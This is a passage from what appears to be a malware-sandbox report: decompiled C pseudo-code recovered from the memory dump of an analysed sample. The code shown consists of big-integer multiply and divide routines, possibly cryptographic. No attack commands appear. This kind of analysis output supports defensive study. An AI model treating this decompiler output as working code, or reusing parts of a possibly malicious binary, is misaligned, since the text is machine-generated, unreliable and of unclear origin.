    																						if(_t470 >  *((intOrPtr*)(_t582 + 8))) {
    																							_t471 = E003A665B( *((intOrPtr*)(_t755 - 0x24)),  *(_t755 - 0x18));
    																							_t704 =  *(_t755 - 0x34);
    																							_t742 =  *(_t755 - 0x30);
    																						} else {
    																							_t471 = _t582;
    																						}
    																						__eflags = _t471;
    																						if(_t471 == 0) {
    																							goto L179;
    																						} else {
    																							__eflags =  *(_t755 - 0x10);
    																							if( *(_t755 - 0x10) == 0) {
    																								_t665 =  *(_t755 - 0x1c);
    																								_t497 = E003A687A(_t755 - 0x74,  *(_t755 - 0x1c));
    																								__eflags = _t497;
    																								if(_t497 < 0) {
    																									_t498 =  *(_t755 - 4);
    																									_t325 = _t498 + 4;
    																									 *_t325 =  *(_t498 + 4) - 1;
    																									__eflags =  *_t325;
    																								} else {
    																									_t665 =  *( *(_t755 - 0x1c));
    																									E003A70EC( *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)),  *( *(_t755 - 0x1c)), _t742);
    																									 *( *(_t755 - 0x28)) = 1;
    																								}
    																							}
    																							_t472 =  *(_t755 - 4);
    																							__eflags =  *(_t472 + 4);
    																							if( *(_t472 + 4) != 0) {
    																								_t331 = _t755 - 0x28;
    																								 *_t331 =  *(_t755 - 0x28) - 4;
    																								__eflags =  *_t331;
    																							} else {
    																								 *(_t472 + 0xc) =  *(_t472 + 0xc) & 0x00000000;
    																							}
    																							_t707 = _t704 - 1;
    																							__eflags = _t707;
    																							if(_t707 <= 0) {
    																								L167:
    																								_t473 =  *(_t560 + 4);
    																								__eflags = _t473;
    																								if(_t473 <= 0) {
    																									L171:
    																									_t745 =  *((intOrPtr*)(_t755 - 8));
    																									_t708 =  *((intOrPtr*)(_t745 + 0xc));
    																									E003AAA38( *((intOrPtr*)(_t755 - 0x48)), _t560, _t665, _t745);
    																									__eflags =  *(_t745 + 4);
    																									if( *(_t745 + 4) != 0) {
    																										 *((intOrPtr*)(_t745 + 0xc)) = _t708;
    																									}
    																									__eflags =  *(_t755 - 0x10);
    																									if( *(_t755 - 0x10) == 0) {
    																										L178:
    																										E003AA6BB( *((intOrPtr*)(_t755 + 0x10)));
    																										goto L101;
    																									}
    																									_t478 =  *(_t755 - 4);
    																									_t585 =  *(_t478 + 4);
    																									__eflags = _t585;
    																									if(_t585 <= 0) {
    																										goto L178;
    																									}
    																									_t586 =  *_t478 + _t585 * 4 - 4;
    																									while(1) {
    																										_t747 =  *_t586;
    																										_t586 = _t586 - 4;
    																										__eflags = _t747;
    																										if(_t747 != 0) {
    																											goto L178;
    																										}
    																										 *(_t478 + 4) =  *(_t478 + 4) - 1;
    																										__eflags =  *(_t478 + 4);
    																										if( *(_t478 + 4) > 0) {
    																											continue;
    																										}
    																										goto L178;
    																									}
    																									goto L178;
    																								}
    																								_t479 =  *_t560 + _t473 * 4 - 4;
    																								while(1) {
    																									_t588 =  *_t479;
    																									_t479 = _t479 - 4;
    																									__eflags = _t588;
    																									if(_t588 != 0) {
    																										goto L171;
    																									}
    																									 *(_t560 + 4) =  *(_t560 + 4) - 1;
    																									__eflags =  *(_t560 + 4) - _t588;
    																									if( *(_t560 + 4) > _t588) {
    																										continue;
    																									}
    																									goto L171;
    																								}
    																								goto L171;
    																							} else {
    																								_t481 =  *(_t755 - 0x28) -  *(_t755 - 0x14);
    																								__eflags = _t481;
    																								 *(_t755 - 0x30) = _t707;
    																								 *(_t755 - 0x3c) = _t481;
    																								do {
    																									_t589 =  *(_t755 - 0x14);
    																									_t482 =  *_t589;
    																									_t709 =  *((intOrPtr*)(_t589 - 4));
    																									__eflags =  *_t589 -  *(_t755 - 0x20);
    																									if( *_t589 !=  *(_t755 - 0x20)) {
    																										_t483 = E003A6F02(_t482, _t709,  *(_t755 - 0x20));
    																										 *((intOrPtr*)(_t755 - 0x40)) = _t709 - _t483 *  *(_t755 - 0x20);
    																										 *(_t755 - 0xc) = _t483;
    																										_t484 =  *(_t755 - 0x2c);
    																										_t667 = _t484 & 0x0000ffff;
    																										 *(_t755 - 0x34) = _t483 & 0x0000ffff;
    																										_t712 = _t483 >> 0x10;
    																										_t485 = _t484 >> 0x10;
    																										_t668 = _t667 *  *(_t755 - 0x34);
    																										 *(_t755 - 0x44) = _t712;
    																										_t486 = _t485 *  *(_t755 - 0x44);
    																										_t714 = _t485 *  *(_t755 - 0x34);
    																										_t597 = _t667 * _t712 + _t714;
    																										 *(_t755 - 0x34) = _t714;
    																										__eflags = _t597 - _t714;
    																										if(_t597 < _t714) {
    																											_t486 = _t486 + 0x10000;
    																											__eflags = _t486;
    																										}
    																										_t598 = _t597 << 0x10;
    																										_t669 = _t668 + _t598;
    																										_t487 = _t486 + (_t597 >> 0x10);
    																										__eflags = _t669 - _t598;
    																										if(_t669 < _t598) {
    																											_t487 = _t487 + 1;
    																											__eflags = _t487;
    																										}
    																										_t599 =  *((intOrPtr*)(_t755 - 0x40));
    																										while(1) {
    																											__eflags = _t487 - _t599;
    																											if(__eflags < 0) {
    																												break;
    																											}
    																											if(__eflags != 0) {
    																												L157:
    																												_t599 = _t599 +  *(_t755 - 0x20);
    																												 *(_t755 - 0xc) =  *(_t755 - 0xc) - 1;
    																												__eflags = _t599 -  *(_t755 - 0x20);
    																												if(_t599 <  *(_t755 - 0x20)) {
    																													break;
    																												}
    																												__eflags = _t669 -  *(_t755 - 0x2c);
    																												if(_t669 <  *(_t755 - 0x2c)) {
    																													_t487 = _t487 - 1;
    																													__eflags = _t487;
    																												}
    																												_t669 = _t669 -  *(_t755 - 0x2c);
    																												__eflags = _t669;
    																												continue;
    																											}
    																											_t718 =  *(_t755 - 0x14);
    																											__eflags = _t669 -  *((intOrPtr*)(_t718 - 8));
    																											if(_t669 <=  *((intOrPtr*)(_t718 - 8))) {
    																												break;
    																											}
    																											goto L157;
    																										}
    																										L162:
    																										_t717 =  *(_t755 - 0x1c);
    																										_t489 = E003A6BFB( *( *(_t755 - 0x1c)),  *( *(_t755 - 0x18)), _t742);
    																										 *((intOrPtr*)(_t755 - 0x74)) =  *((intOrPtr*)(_t755 - 0x74)) - 4;
    																										 *((intOrPtr*)( *( *(_t755 - 0x18)) + _t742 * 4)) = _t489;
    																										_t491 = E003A70EC( *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)),  *( *(_t755 - 0x18)),  *((intOrPtr*)(_t755 - 0x24)));
    																										__eflags = _t491;
    																										if(_t491 == 0) {
    																											L165:
    																											_t492 =  *(_t755 - 0x14);
    																											goto L166;
    																										}
    																										 *(_t755 - 0xc) =  *(_t755 - 0xc) - 1;
    																										_t495 = E003A6FFC( *_t717,  *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)), _t742);
    																										__eflags = _t495;
    																										if(_t495 == 0) {
    																											goto L165;
    																										}
    																										_t492 =  *(_t755 - 0x14);
    																										 *_t492 =  *_t492 + 1;
    																										goto L166;
    																									}
    																									 *(_t755 - 0xc) =  *(_t755 - 0xc) | 0xffffffff;
    																									goto L162;
    																									L166:
    																									_t665 =  *(_t755 - 0xc);
    																									 *( *(_t755 - 0x3c) + _t492) =  *(_t755 - 0xc);
    																									_t380 = _t755 - 0x30;
    																									 *_t380 =  *(_t755 - 0x30) - 1;
    																									__eflags =  *_t380;
    																									 *(_t755 - 0x14) = _t492 - 4;
    																								} while ( *_t380 != 0);
    																								goto L167;
    																							}
    																						}
    																					}
    																				}
    																				_t503 =  *((intOrPtr*)(_t741 + 4));
    																				_t610 =  *(_t560 + 4);
    																				__eflags = _t610 - _t503 + 1;
    																				if(_t610 > _t503 + 1) {
    																					_t719 = _t610 + 1;
    																					__eflags = _t610 + 1 -  *((intOrPtr*)(_t560 + 8));
    																					if(_t610 + 1 >  *((intOrPtr*)(_t560 + 8))) {
    																						_t504 = E003A665B(_t719, _t560);
    																					} else {
    																						_t504 = _t560;
    																					}
    																					__eflags = _t504;
    																					if(_t504 == 0) {
    																						goto L179;
    																					} else {
    																						 *( *_t560 +  *(_t560 + 4) * 4) =  *( *_t560 +  *(_t560 + 4) * 4) & 0x00000000;
    																						_t260 = _t560 + 4;
    																						 *_t260 =  *(_t560 + 4) + 1;
    																						__eflags =  *_t260;
    																						goto L128;
    																					}
    																				}
    																				_t720 = _t503 + 2;
    																				__eflags = _t503 + 2 -  *((intOrPtr*)(_t560 + 8));
    																				if(_t503 + 2 >  *((intOrPtr*)(_t560 + 8))) {
    																					_t506 = E003A665B(_t720, _t560);
    																					_t741 =  *(_t755 - 0x1c);
    																				} else {
    																					_t506 = _t560;
    																				}
    																				__eflags = _t506;
    																				if(_t506 == 0) {
    																					goto L179;
    																				} else {
    																					_t507 =  *(_t560 + 4);
    																					while(1) {
    																						__eflags = _t507 -  *((intOrPtr*)(_t741 + 4)) + 2;
    																						if(_t507 >=  *((intOrPtr*)(_t741 + 4)) + 2) {
    																							break;
    																						}
    																						 *( *_t560 + _t507 * 4) =  *( *_t560 + _t507 * 4) & 0x00000000;
    																						_t507 = _t507 + 1;
    																						__eflags = _t507;
    																					}
    																					 *(_t560 + 4) =  *((intOrPtr*)(_t741 + 4)) + 2;
    																					goto L128;
    																				}
    																			}
    																		} else {
    																			if(E003A669B(_t573,  *((intOrPtr*)(_t755 - 8)),  *((intOrPtr*)(_t755 - 8))) == 0) {
    																				goto L102;
    																			}
    																			L101:
    																			 *(_t755 - 0x38) = 1;
    																			goto L102;
    																		}
    																	}
    																}
    																if( *((intOrPtr*)( *_t573 + _t445 * 4 - 4)) == 0) {
    																	goto L102;
    																}
    																_t573 =  *((intOrPtr*)(_t755 - 8));
    																goto L94;
    															}
    														}
    														_t517 =  *(_t755 - 4);
    														_t618 =  *(_t517 + 4);
    														__eflags = _t618 - _t658;
    														if(_t618 <= _t658) {
    															goto L85;
    														}
    														_t619 =  *_t517 + _t618 * 4 - 4;
    														while(1) {
    															_t751 =  *_t619;
    															_t619 = _t619 - 4;
    															__eflags = _t751;
    															if(_t751 != 0) {
    																goto L85;
    															}
    															 *(_t517 + 4) =  *(_t517 + 4) - 1;
    															__eflags =  *(_t517 + 4) - _t658;
    															if( *(_t517 + 4) > _t658) {
    																continue;
    															}
    															goto L85;
    														}
    														goto L85;
    													}
    													_t518 =  *_t558 + _t437 * 4 - 4;
    													while(1) {
    														_t621 =  *_t518;
    														_t518 = _t518 - 4;
    														__eflags = _t621;
    														if(_t621 != 0) {
    															goto L80;
    														}
    														 *(_t558 + 4) =  *(_t558 + 4) - 1;
    														__eflags =  *(_t558 + 4) - _t658;
    														if( *(_t558 + 4) > _t658) {
    															continue;
    														}
    														goto L80;
    													}
    													goto L80;
    												} else {
    													_t520 =  *(_t755 - 0xc) -  *(_t755 - 0x10);
    													__eflags = _t520;
    													 *(_t755 - 0x2c) = _t697;
    													 *(_t755 - 0x44) = _t520;
    													do {
    														_t622 =  *(_t755 - 0x10);
    														_t521 =  *_t622;
    														_t721 =  *((intOrPtr*)(_t622 - 4));
    														__eflags =  *_t622 -  *(_t755 - 0x18);
    														if( *_t622 !=  *(_t755 - 0x18)) {
    															_t522 = E003A6F02(_t521, _t721,  *(_t755 - 0x18));
    															 *((intOrPtr*)(_t755 - 0x40)) = _t721 - _t522 *  *(_t755 - 0x18);
    															 *(_t755 - 0xc) = _t522;
    															_t523 =  *(_t755 - 0x28);
    															_t677 = _t523 & 0x0000ffff;
    															 *(_t755 - 0x30) = _t522 & 0x0000ffff;
    															_t724 = _t522 >> 0x10;
    															_t524 = _t523 >> 0x10;
    															_t678 = _t677 *  *(_t755 - 0x30);
    															 *(_t755 - 0x3c) = _t724;
    															_t525 = _t524 *  *(_t755 - 0x3c);
    															_t726 = _t524 *  *(_t755 - 0x30);
    															_t630 = _t677 * _t724 + _t726;
    															 *(_t755 - 0x30) = _t726;
    															__eflags = _t630 - _t726;
    															if(_t630 < _t726) {
    																_t525 = _t525 + 0x10000;
    																__eflags = _t525;
    															}
    															_t631 = _t630 << 0x10;
    															_t679 = _t678 + _t631;
    															_t526 = _t525 + (_t630 >> 0x10);
    															__eflags = _t679 - _t631;
    															if(_t679 < _t631) {
    																_t526 = _t526 + 1;
    																__eflags = _t526;
    															}
    															_t632 =  *((intOrPtr*)(_t755 - 0x40));
    															while(1) {
    																__eflags = _t526 - _t632;
    																if(__eflags < 0) {
    																	break;
    																}
    																if(__eflags != 0) {
    																	L66:
    																	_t632 = _t632 +  *(_t755 - 0x18);
    																	 *(_t755 - 0xc) =  *(_t755 - 0xc) - 1;
    																	__eflags = _t632 -  *(_t755 - 0x18);
    																	if(_t632 <  *(_t755 - 0x18)) {
    																		break;
    																	}
    																	__eflags = _t679 -  *(_t755 - 0x28);
    																	if(_t679 <  *(_t755 - 0x28)) {
    																		_t526 = _t526 - 1;
    																		__eflags = _t526;
    																	}
    																	_t679 = _t679 -  *(_t755 - 0x28);
    																	__eflags = _t679;
    																	continue;
    																}
    																_t730 =  *(_t755 - 0x10);
    																__eflags = _t679 -  *((intOrPtr*)(_t730 - 8));
    																if(_t679 <=  *((intOrPtr*)(_t730 - 8))) {
    																	break;
    																}
    																goto L66;
    															}
    															L71:
    															_t729 =  *(_t755 - 0x1c);
    															_t528 = E003A6BFB( *( *(_t755 - 0x1c)),  *( *(_t755 - 0x20)), _t737);
    															 *((intOrPtr*)(_t755 - 0x74)) =  *((intOrPtr*)(_t755 - 0x74)) - 4;
    															 *((intOrPtr*)( *( *(_t755 - 0x20)) + _t737 * 4)) = _t528;
    															_t530 = E003A70EC( *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)),  *( *(_t755 - 0x20)),  *(_t755 - 0x34));
    															__eflags = _t530;
    															if(_t530 == 0) {
    																L74:
    																_t531 =  *(_t755 - 0x10);
    																goto L75;
    															}
    															 *(_t755 - 0xc) =  *(_t755 - 0xc) - 1;
    															_t534 = E003A6FFC( *_t729,  *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)), _t737);
    															__eflags = _t534;
    															if(_t534 == 0) {
    																goto L74;
    															}
    															_t531 =  *(_t755 - 0x10);
    															 *_t531 =  *_t531 + 1;
    															goto L75;
    														}
    														 *(_t755 - 0xc) =  *(_t755 - 0xc) | 0xffffffff;
    														goto L71;
    														L75:
    														 *( *(_t755 - 0x44) + _t531) =  *(_t755 - 0xc);
    														_t173 = _t755 - 0x2c;
    														 *_t173 =  *(_t755 - 0x2c) - 1;
    														__eflags =  *_t173;
    														 *(_t755 - 0x10) = _t531 - 4;
    													} while ( *_t173 != 0);
    													goto L76;
    												}
    											}
    										}
    									}
    									_t542 =  *((intOrPtr*)(_t736 + 4));
    									_t643 =  *(_t558 + 4);
    									__eflags = _t643 - _t542 + 1;
    									if(_t643 > _t542 + 1) {
    										_t732 = _t643 + 1;
    										__eflags = _t643 + 1 -  *((intOrPtr*)(_t558 + 8));
    										if(_t643 + 1 >  *((intOrPtr*)(_t558 + 8))) {
    											_t543 = E003A665B(_t732, _t558);
    										} else {
    											_t543 = _t558;
    										}
    										__eflags = _t543;
    										if(_t543 == 0) {
    											goto L179;
    										} else {
    											 *( *_t558 +  *(_t558 + 4) * 4) =  *( *_t558 +  *(_t558 + 4) * 4) & 0x00000000;
    											_t57 = _t558 + 4;
    											 *_t57 =  *(_t558 + 4) + 1;
    											__eflags =  *_t57;
    											goto L38;
    										}
    									}
    									_t733 = _t542 + 2;
    									__eflags = _t542 + 2 -  *((intOrPtr*)(_t558 + 8));
    									if(_t542 + 2 >  *((intOrPtr*)(_t558 + 8))) {
    										_t545 = E003A665B(_t733, _t558);
    										_t736 =  *(_t755 - 0x1c);
    									} else {
    										_t545 = _t558;
    									}
    									__eflags = _t545;
    									if(_t545 == 0) {
    										goto L179;
    									} else {
    										_t546 =  *(_t558 + 4);
    										while(1) {
    											__eflags = _t546 -  *((intOrPtr*)(_t736 + 4)) + 2;
    											if(_t546 >=  *((intOrPtr*)(_t736 + 4)) + 2) {
    												break;
    											}
    											 *( *_t558 + _t546 * 4) =  *( *_t558 + _t546 * 4) & 0x00000000;
    											_t546 = _t546 + 1;
    											__eflags = _t546;
    										}
    										 *(_t558 + 4) =  *((intOrPtr*)(_t736 + 4)) + 2;
    										goto L38;
    									}
    								}
    							}
    							_t698 =  *(_t755 - 4);
    							_t658 = _t755 - 0x60;
    							if(E003A687A(_t698, _t755 - 0x60) >= 0) {
    								goto L16;
    							}
    							E003A6732(_t698, 0);
    							goto L86;
    						}
    					}
    					if( *((intOrPtr*)( *_t562 + _t413 * 4 - 4)) == 0) {
    						goto L102;
    					}
    					_t562 =  *(_t755 - 4);
    					goto L9;
    				}
    			}

    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003A9885(void* __eax, void* __ecx, void* __esi) {
    				void* _t331;
    				unsigned int _t332;
    				signed int _t333;
    				void* _t338;
    				void* _t340;
    				void* _t341;
    				void* _t342;
    				signed int _t343;
    				void* _t345;
    				void* _t346;
    				void* _t347;
    				signed int _t348;
    				void* _t350;
    				void* _t351;
    				void* _t352;
    				signed int _t353;
    				signed int _t354;
    				void* _t356;
    				signed int _t358;
    				void* _t360;
    				signed int _t362;
    				signed int _t363;
    				void* _t364;
    				signed int _t366;
    				signed int _t367;
    				void* _t368;
    				signed int _t370;
    				signed int _t371;
    				void* _t372;
    				signed int _t375;
    				signed int _t376;
    				void* _t377;
    				signed int _t379;
    				signed int _t380;
    				void* _t381;
    				signed int _t383;
    				signed int _t384;
    				void* _t385;
    				signed int _t387;
    				void* _t389;
    				signed int _t391;
    				signed int _t392;
    				void* _t393;
    				signed int _t395;
    				signed int _t396;
    				void* _t397;
    				signed int _t400;
    				signed int _t401;
    				void* _t402;
    				signed int _t404;
    				signed int _t405;
    				void* _t406;
    				signed int _t408;
    				void* _t410;
    				signed int _t412;
    				signed int _t413;
    				void* _t414;
    				signed int _t416;
    				signed int _t417;
    				signed int _t418;
    				signed int _t419;
    				void* _t422;
    				void* _t424;
    				intOrPtr _t426;
    				unsigned int _t427;
    				signed int _t428;
    				void* _t430;
    				unsigned int _t433;
    				signed int _t434;
    				void* _t435;
    				unsigned int _t438;
    				signed int _t439;
    				void* _t440;
    				unsigned int _t443;
    				signed int _t444;
    				void* _t445;
    				intOrPtr _t447;
    				unsigned int _t450;
    				signed int _t451;
    				void* _t452;
    				unsigned int _t455;
    				signed int _t456;
    				void* _t457;
    				unsigned int _t460;
    				signed int _t461;
    				void* _t462;
    				intOrPtr _t464;
    				unsigned int _t465;
    				signed int _t466;
    				void* _t468;
    				unsigned int _t471;
    				signed int _t472;
    				void* _t473;
    				unsigned int _t476;
    				signed int _t477;
    				void* _t478;
    				intOrPtr _t480;
    				unsigned int _t483;
    				signed int _t484;
    				void* _t485;
    				unsigned int _t488;
    				signed int _t489;
    				void* _t490;
    				intOrPtr _t492;
    				unsigned int _t493;
    				signed int _t494;
    				void* _t496;
    				unsigned int _t499;
    				signed int _t500;
    				void* _t501;
    				intOrPtr _t503;
    				unsigned int _t506;
    				signed int _t507;
    				signed int _t508;
    				intOrPtr _t510;
    				signed int _t512;
    				signed int _t513;
    				signed int _t516;
    				signed int _t518;
    				signed int _t521;
    				signed int _t523;
    				signed int _t526;
    				signed int _t528;
    				signed int _t531;
    				signed int _t533;
    				signed int _t536;
    				signed int _t538;
    				signed int _t541;
    				signed int _t543;
    				signed int _t548;
    				signed int _t550;
    				signed int _t553;
    				signed int _t555;
    				signed int _t558;
    				signed int _t560;
    				signed int _t563;
    				signed int _t565;
    				signed int _t570;
    				signed int _t572;
    				signed int _t575;
    				signed int _t577;
    				void* _t581;
    				void* _t582;
    				intOrPtr _t583;
    				void* _t585;
    				unsigned int _t587;
    				signed int _t588;
    				signed int _t589;
    				signed int _t590;
    				void* _t591;
    				signed int _t592;
    				signed int _t593;
    				void* _t594;
    				signed int _t595;
    				signed int _t596;
    				void* _t597;
    				signed int _t598;
    				signed int _t599;
    				void* _t600;
    				signed int _t601;
    				signed int _t602;
    				void* _t603;
    				signed int _t604;
    				signed int _t605;
    				void* _t606;
    				unsigned int _t608;
    				signed int _t609;
    				signed int _t610;
    				signed int _t611;
    				void* _t612;
    				signed int _t613;
    				signed int _t614;
    				void* _t615;
    				signed int _t616;
    				signed int _t617;
    				void* _t618;
    				signed int _t619;
    				signed int _t620;
    				void* _t621;
    				unsigned int _t623;
    				signed int _t624;
    				signed int _t625;
    				signed int _t626;
    				void* _t627;
    				signed int _t628;
    				signed int _t629;
    				void* _t630;
    				signed int _t631;
    				void* _t633;
    
    				_t585 = __esi;
    				_t356 = __ecx;
    				_t331 = __eax;
    				_t424 = __ecx;
    				if( *(_t633 - 4) < __esi) {
    					_t424 = __ecx + 1;
    				}
    				_t340 =  *(_t633 - 0xc) + _t424;
    				if(_t340 < _t424) {
    					 *(_t633 - 8) =  *(_t633 - 8) + 1;
    				}
    				_t426 =  *(_t633 - 4) + _t585;
    				if(_t426 < _t585) {
    					_t356 = _t356 + 1;
    				}
    				_t341 = _t340 + _t356;
    				if(_t341 < _t356) {
    					 *(_t633 - 8) =  *(_t633 - 8) + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) & 0x00000000;
    				 *((intOrPtr*)( *(_t633 + 8) + 0x1c)) = _t426;
    				_t427 =  *(_t331 + 0x10);
    				_t358 = _t427 & 0x0000ffff;
    				_t428 = _t427 >> 0x10;
    				_t587 = _t358 * _t428;
    				_t588 = _t587 << 0x11;
    				_t360 = _t358 * _t358 + _t588;
    				_t430 = _t428 * _t428 + (_t587 >> 0xf);
    				if(_t360 < _t588) {
    					_t430 = _t430 + 1;
    				}
    				_t342 = _t341 + _t360;
    				if(_t342 < _t360) {
    					_t430 = _t430 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t430;
    				if( *(_t633 - 8) < _t430) {
    					 *(_t633 - 4) = 1;
    				}
    				_t516 =  *(_t331 + 0xc) & 0x0000ffff;
    				_t589 =  *(_t331 + 0x14) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0xe) & 0x0000ffff;
    				_t362 =  *(_t331 + 0x16) & 0x0000ffff;
    				_t590 = _t589 * _t516;
    				 *(_t633 - 0x14) = _t516;
    				_t363 = _t362 *  *(_t633 - 0x10);
    				_t518 = _t362 *  *(_t633 - 0x14);
    				_t433 = _t589 *  *(_t633 - 0x10) + _t518;
    				if(_t433 < _t518) {
    					_t363 = _t363 + 0x10000;
    				}
    				_t434 = _t433 << 0x10;
    				_t591 = _t590 + _t434;
    				_t364 = _t363 + (_t433 >> 0x10);
    				if(_t591 < _t434) {
    					_t364 = _t364 + 1;
    				}
    				_t343 = _t342 + _t591;
    				_t435 = _t364;
    				 *(_t633 - 0xc) = _t343;
    				if(_t343 < _t591) {
    					_t435 = _t364 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t435;
    				if( *(_t633 - 8) < _t435) {
    					 *(_t633 - 4) =  *(_t633 - 4) + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t591;
    				if( *(_t633 - 0xc) < _t591) {
    					_t364 = _t364 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t364;
    				if( *(_t633 - 8) < _t364) {
    					 *(_t633 - 4) =  *(_t633 - 4) + 1;
    				}
    				_t521 =  *(_t331 + 8) & 0x0000ffff;
    				_t592 =  *(_t331 + 0x18) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0xa) & 0x0000ffff;
    				_t366 =  *(_t331 + 0x1a) & 0x0000ffff;
    				_t593 = _t592 * _t521;
    				 *(_t633 - 0x14) = _t521;
    				_t367 = _t366 *  *(_t633 - 0x10);
    				_t523 = _t366 *  *(_t633 - 0x14);
    				_t438 = _t592 *  *(_t633 - 0x10) + _t523;
    				if(_t438 < _t523) {
    					_t367 = _t367 + 0x10000;
    				}
    				_t439 = _t438 << 0x10;
    				_t594 = _t593 + _t439;
    				_t368 = _t367 + (_t438 >> 0x10);
    				if(_t594 < _t439) {
    					_t368 = _t368 + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t594;
    				_t440 = _t368;
    				if( *(_t633 - 0xc) < _t594) {
    					_t440 = _t368 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t440;
    				if( *(_t633 - 8) < _t440) {
    					 *(_t633 - 4) =  *(_t633 - 4) + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t594;
    				if( *(_t633 - 0xc) < _t594) {
    					_t368 = _t368 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t368;
    				if( *(_t633 - 8) < _t368) {
    					 *(_t633 - 4) =  *(_t633 - 4) + 1;
    				}
    				_t526 =  *(_t331 + 4) & 0x0000ffff;
    				_t595 =  *(_t331 + 0x1c) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 6) & 0x0000ffff;
    				_t370 =  *(_t331 + 0x1e) & 0x0000ffff;
    				_t596 = _t595 * _t526;
    				 *(_t633 - 0x14) = _t526;
    				_t371 = _t370 *  *(_t633 - 0x10);
    				_t528 = _t370 *  *(_t633 - 0x14);
    				_t443 = _t595 *  *(_t633 - 0x10) + _t528;
    				if(_t443 < _t528) {
    					_t371 = _t371 + 0x10000;
    				}
    				_t444 = _t443 << 0x10;
    				_t597 = _t596 + _t444;
    				_t372 = _t371 + (_t443 >> 0x10);
    				if(_t597 < _t444) {
    					_t372 = _t372 + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t597;
    				_t445 = _t372;
    				if( *(_t633 - 0xc) < _t597) {
    					_t445 = _t372 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t445;
    				if( *(_t633 - 8) < _t445) {
    					 *(_t633 - 4) =  *(_t633 - 4) + 1;
    				}
    				_t447 =  *(_t633 - 0xc) + _t597;
    				if(_t447 < _t597) {
    					_t372 = _t372 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t372;
    				if( *(_t633 - 8) < _t372) {
    					 *(_t633 - 4) =  *(_t633 - 4) + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) & 0x00000000;
    				 *((intOrPtr*)( *(_t633 + 8) + 0x20)) = _t447;
    				_t531 =  *(_t331 + 8) & 0x0000ffff;
    				_t598 =  *(_t331 + 0x1c) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0xa) & 0x0000ffff;
    				_t375 =  *(_t331 + 0x1e) & 0x0000ffff;
    				_t599 = _t598 * _t531;
    				 *(_t633 - 0x14) = _t531;
    				_t376 = _t375 *  *(_t633 - 0x10);
    				_t533 = _t375 *  *(_t633 - 0x14);
    				_t450 = _t598 *  *(_t633 - 0x10) + _t533;
    				if(_t450 < _t533) {
    					_t376 = _t376 + 0x10000;
    				}
    				_t451 = _t450 << 0x10;
    				_t600 = _t599 + _t451;
    				_t377 = _t376 + (_t450 >> 0x10);
    				if(_t600 < _t451) {
    					_t377 = _t377 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t600;
    				_t452 = _t377;
    				if( *(_t633 - 8) < _t600) {
    					_t452 = _t377 + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t452;
    				if( *(_t633 - 4) < _t452) {
    					 *(_t633 - 0xc) = 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t600;
    				if( *(_t633 - 8) < _t600) {
    					_t377 = _t377 + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t377;
    				if( *(_t633 - 4) < _t377) {
    					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
    				}
    				_t536 =  *(_t331 + 0xc) & 0x0000ffff;
    				_t601 =  *(_t331 + 0x18) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0xe) & 0x0000ffff;
    				_t379 =  *(_t331 + 0x1a) & 0x0000ffff;
    				_t602 = _t601 * _t536;
    				 *(_t633 - 0x14) = _t536;
    				_t380 = _t379 *  *(_t633 - 0x10);
    				_t538 = _t379 *  *(_t633 - 0x14);
    				_t455 = _t601 *  *(_t633 - 0x10) + _t538;
    				if(_t455 < _t538) {
    					_t380 = _t380 + 0x10000;
    				}
    				_t456 = _t455 << 0x10;
    				_t603 = _t602 + _t456;
    				_t381 = _t380 + (_t455 >> 0x10);
    				if(_t603 < _t456) {
    					_t381 = _t381 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t603;
    				_t457 = _t381;
    				if( *(_t633 - 8) < _t603) {
    					_t457 = _t381 + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t457;
    				if( *(_t633 - 4) < _t457) {
    					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t603;
    				if( *(_t633 - 8) < _t603) {
    					_t381 = _t381 + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t381;
    				if( *(_t633 - 4) < _t381) {
    					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
    				}
    				_t541 =  *(_t331 + 0x10) & 0x0000ffff;
    				_t604 =  *(_t331 + 0x14) & 0x0000ffff;
